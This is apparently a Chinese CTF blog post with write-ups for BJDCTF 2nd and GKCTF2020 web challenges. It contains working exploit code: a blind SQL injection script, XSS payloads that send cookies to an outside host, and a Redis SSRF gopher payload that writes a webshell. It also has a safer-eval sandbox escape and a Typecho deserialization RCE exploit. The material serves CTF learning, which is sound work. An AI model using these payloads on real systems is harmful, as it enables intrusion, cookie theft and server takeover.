BJDCTF 2nd之web

[BJDCTF 2nd]简单注入

打开题目 扫目录发现robots.txt

提示有hint.txt

在这里插入图片描述

这题题解真是鬼才 md

在登录框测试 发现过滤了单引号 得想想其他办法了

这里给了查询语句 我们可以在 username输入 \ 转义 单引号造成 password 后面输入的信息逃逸

1
select * from users where username='admin\' and password='or 1#';

那我们现在所需要做的就是得到 password 因为他提示了我们需要得到正确密码才能得到flag

上脚本 这里有个坑 buu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import time
url = "http://c6674d57-499f-4db5-9048-cd5f86efc1b0.node3.buuoj.cn/index.php"

data = {"username":"admin\\","password":""}
result = ""
i = 0

while( True ):
i = i + 1
head=32
tail=127

while( head < tail ):
mid = (head + tail) >> 1

# payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
# OhyOuFOuNdit
payload = "or/**/1^(ascii(substr(password,%d,1))>%d)#"%(i,mid)
time.sleep(0.5)
data['password'] = payload
r = requests.post(url,data=data)

if "stronger" in r.text :
head = mid + 1
else:
tail = mid

last = result

if head!=32:
result += chr(head)
else:
break
print(result)

[BJDCTF 2nd]xss之光

git源码泄露

1
2
3
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

题目说是xss 我孤陋寡闻 没见过这样利用的

利用__toString

__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串

Exception

适用于php5、7版本

在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法
测试代码:

1
2
3
<?php
$a = unserialize($_GET['yds']);
echo $a;

exp:

1
2
3
4
5
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
//得:O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

echo unserialize($c);
则我们在url中令:

1
/?yds=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

就会弹窗 1

我们拿到源码仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化;又发现有个echo;所以我们最好对有_toString方法的类进行反序列化;在 _toString()的原生类反序列化中,常用的是Error和Exception,Error只适于php7,Exception php5和php7都适用,这里我们查看一下题目的环境发现是php5;
由于此题是xss,所以只要xss执行window.open()就能把flag带出来,所以直接这样:

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法

也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>");
echo urlencode(serialize($a));
?>

或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>

什么是HttpOnly
如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。

得到的传入 get参数 查看cookies参数就行

参:https://blog.csdn.net/qq_45521281/article/details/105812056

[BJDCTF 2nd]elementmaster

一脸问号。。。。。

y1ng师傅出的脑洞题

上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import os
import requests as req
elements = ('H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue')
for symbol in elements:
link = "http://element-master.bjdctf.y1ng.vip:12309/" + symbol + ".php"
response = req.get(link)
if response.status_code == 200:
print(response.text, end='')
else:
continue

跑出来得到一个文件名 访问就能得到flag

And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

不明白的直接看 y1ng师傅的博客:https://www.gem-love.com/ctf/2097.html#XSS

脑洞题 不用太纠结 毕竟这题听说给了快10个hint

[BJDCTF 2nd]Schrödinger

脑洞题

在界面将 cookie设置为 空 check一下就行

[BJDCTF 2nd]duangShell

提示了是 swp源码泄露

源码藏在 /.index.php.swp

然后 vim -r 解得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
die("where is P3rh4ps's girl friend ???");
} else {
$girl = $_POST['girl_friend'];
if (preg_match('/\>|\\\/', $girl)) {
die('just girl');
} else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
} else {
//duangShell~~~~
exec($girl);
}
}

exec()system() 不同,exec() 无回显

参:https://blog.csdn.net/solitudi/article/details/108876692

https://blog.csdn.net/qq_45521281/article/details/105351352

[BJDCTF 2nd]文件探测

扫描抓包 发现home.php admin.php

先看home.php

感觉有文件包含 但是发现会被自动加后缀 于是就只能用伪协议读一下 system的源码

system.php源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
header("Refresh:0.1;url=index.php");
die;
}

$str2 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;url invalid<br>~$ ';
$str3 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;damn hacker!<br>~$ ';
$str4 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;request method error<br>~$ ';

?>
<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
$url = $_POST['q2'].".y1ng.txt";
$method = $_POST['q3'];

$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

echo $str1;

if (!preg_match($filter1, $url) ){
die($str2);
}
if (preg_match($filter2, $url)) {
die($str3);
}
if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
die($str4);
}
$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));
}
?>

home.php源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
die("forbidden");
}

if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("not now!");
}

if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
die("You! are! not! my! admin!");
}

if(preg_match("/^home$/i", $_GET['file'])){
die("禁止套娃");
}

else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "现在访问的是 ".$file . "<br>";
require $file;
}
} else {
echo "<script>location.href='./home.php?file=system'</script>";
}

[GKCTF2020]老八小超市儿

发现后台

上传主题getshell(路径 /public/static/index/default/shell.php)

这里路径要参照下载的压缩包 和主页的题目判断

连上蚁剑后 有一个假的flag

又发现 auto.sh

1
2
#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

看了下进程是以root运行的,并且所有者是root

makeflaghint.py:

1
2
3
4
5
6
7
8
9
10
import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
f.write(str(gk1))
f.write(str(gk))
f.close()

直接加上

1
2
ff = io.open("/root/flag", "rb+")
f.write(str(ff.read()))

等待60s去flag.hint文件里查看flag了

参:https://blog.csdn.net/weixin_43553654/article/details/106949100

[GKCTF2020]EZ三剑客-EzWeb

随便输了个 baidu.com 发现会请求数据

查看源代码 给了个提示 访问

在这里插入图片描述

给了ip 感觉是ssrf了。。。

file 协议尝试读读看

file:/var/www/html/index.php 得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}

if(isset($_GET['submit'])){
$url = $_GET['url'];
//echo $url."\n";
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
//var_dump($match);
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>

结合之前给的ip地址还没有利用上,可以使用http协议跑存活主机地址

最后扫描到D段11有信息。并且告诉我们我们需要打端口。那就再来一次。发现是6379

发现6379端口出现的提示,查看6379开启的是什么服务

通过百度发现6379一般开启的是redis服务

因为输入url这里只限制了file://,没有ban掉gopher://,很容易想到是Redis SSRF getshell,可以参考这篇文章:

https://byqiyou.github.io/2019/07/15/%E6%B5%85%E6%9E%90Redis%E4%B8%ADSSRF%E7%9A%84%E5%88%A9%E7%94%A8/

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import urllib
protocol="gopher://"
ip="10.0.113.11" # 运行有redis的主机ip
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd

if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload

得到

1
gopher://10.0.113.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%247%0D%0Acmd.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

这里也可以使用 github的一个自动化武器: https://github.com/tarunkant/Gopherus

把上面这个输入url 然后 请求 http://10.0.113.11/shell.php就能得到flag

1
http://df77808e-b3d0-4e06-9d9e-d31398e49ae4.node3.buuoj.cn/index.php?url=http://10.0.113.11/shell.php&submit=提交

这里脚本进行命令执行可以,但是不能上传一句话木马坑了我好久,问题是啥暂时没有弄清楚

参:https://a16n.github.io/2020/11/01/GKCTF2020-EZ%E4%B8%89%E5%89%91%E5%AE%A2-EzWeb/

[GKCTF2020]EZ三剑客-EzNode

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
if (req.path === '/eval') {
let delay = 60 * 1000;
console.log(delay);
if (Number.isInteger(parseInt(req.query.delay))) {
delay = Math.max(delay, parseInt(req.query.delay));
}
const t = setTimeout(() => next(), delay);
// 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
setTimeout(() => {
clearTimeout(t);
console.log('timeout');
try {
res.send('Timeout!');
} catch (e) {

}
}, 1000);
} else {
next();
}
});

app.post('/eval', function (req, res) {
let response = '';
if (req.body.e) {
try {
response = saferEval(req.body.e);
} catch (e) {
response = 'Wrong Wrong Wrong!!!!';
}
}
res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
res.set('Content-Type', 'text/javascript;charset=utf-8');
res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
res.set('Content-Type', 'text/json;charset=utf-8');
res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
res.set('Content-Type', 'text/html;charset=utf-8');
res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
console.log('Start listening')
});

看看下面这些重点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
app.use((req, res, next) => {
if (req.path === '/eval') {
let delay = 60 * 1000; //设置delay初始值
console.log(delay);
if (Number.isInteger(parseInt(req.query.delay))) { //将get传的delay转为int型
delay = Math.max(delay, parseInt(req.query.delay)); //从默认和我们传的值中选一个大的值
}
const t = setTimeout(() => next(), delay); //进行延迟执行函数,next下一个函数

setTimeout(() => { //这里开始也是一个延时执行,但它的延迟要比默认情况下的小
clearTimeout(t); //也就是默认情况它先执行
console.log('timeout');
try { //它会让我们直接退出
res.send('Timeout!');
} catch (e) {

}
}, 1000);
} else {
next();
}
});

关于setTimeout()

https://www.jeffjade.com/2016/01/10/2016-01-10-javacript-setTimeout/

很显然我们要先执行什么面那个,才有可能得到flag,不然就直接退出了。我们只需要将delay的值大于2147483647 就可以了 我们传2147483648 就可绕过。

查看版本 "safer-eval": "1.3.6"

我们想要不被捕获不报错,我们可以使用上面说的沙箱逃逸,这个版本有漏洞,沙箱逃逸

我们将post的e赋值为:

1
2
3
4
(function () {
const process = clearImmediate.constructor("return process;")();
return process.mainModule.require("child_process").execSync("cat /flag").toString()
})()

同时传上get参数 delay

[GKCTF2020]EZ三剑客-EzTypecho

Typecho install.php存在的反序列化漏洞+绕过$_session检测

漏洞分析:

https://www.freebuf.com/vuls/155753.html

https://www.freebuf.com/vuls/155753.html

传入的反序列化字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php

class Typecho_Feed
{
const RSS2 = 'RSS 2.0';
const ATOM1 = 'ATOM 1.0';

private $_type;
private $_items;

public function __construct() {
//$this->_type = $this::RSS2;

$this->_type = $this::ATOM1;
$this->_items[0] = array(
'category' => array(new Typecho_Request()),
'author' => new Typecho_Request(),
);
}
}

class Typecho_Request
{
private $_params = array();
private $_filter = array();

public function __construct() {
$this->_params['screenName'] = "cat /flag";
$this->_filter[0] = 'system';
}
}

$exp = array(
'adapter' => new Typecho_Feed(),
'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#coding=utf-8
import requests

s = requests.Session()

files = {"file":"eki"}

cookies = {
"PHPSESSID":"test",
"__typecho_config":"YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6Mjp7czo4OiJjYXRlZ29yeSI7YToxOntpOjA7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJjYXQgL2ZsYWciO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJjYXQgL2ZsYWciO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9"
}

headers ={
"Referer":"http://30205fa6-2384-4aca-bb0f-8b217b32b0e6.node3.buuoj.cn/install.php"
}

data = {
"PHP_SESSION_UPLOAD_PROGRESS": "123456789"
}

req = s.post("http://30205fa6-2384-4aca-bb0f-8b217b32b0e6.node3.buuoj.cn/install.php?finish=1",files=files,cookies=cookies,headers=headers,data=data)

print req.text

这里要多穿一个REFERER

1
2
3
4
5
if (!empty($_GET) || !empty($_POST)) {
if (empty($_SERVER['HTTP_REFERER'])) {
exit;
}

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 Wh1tecell
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~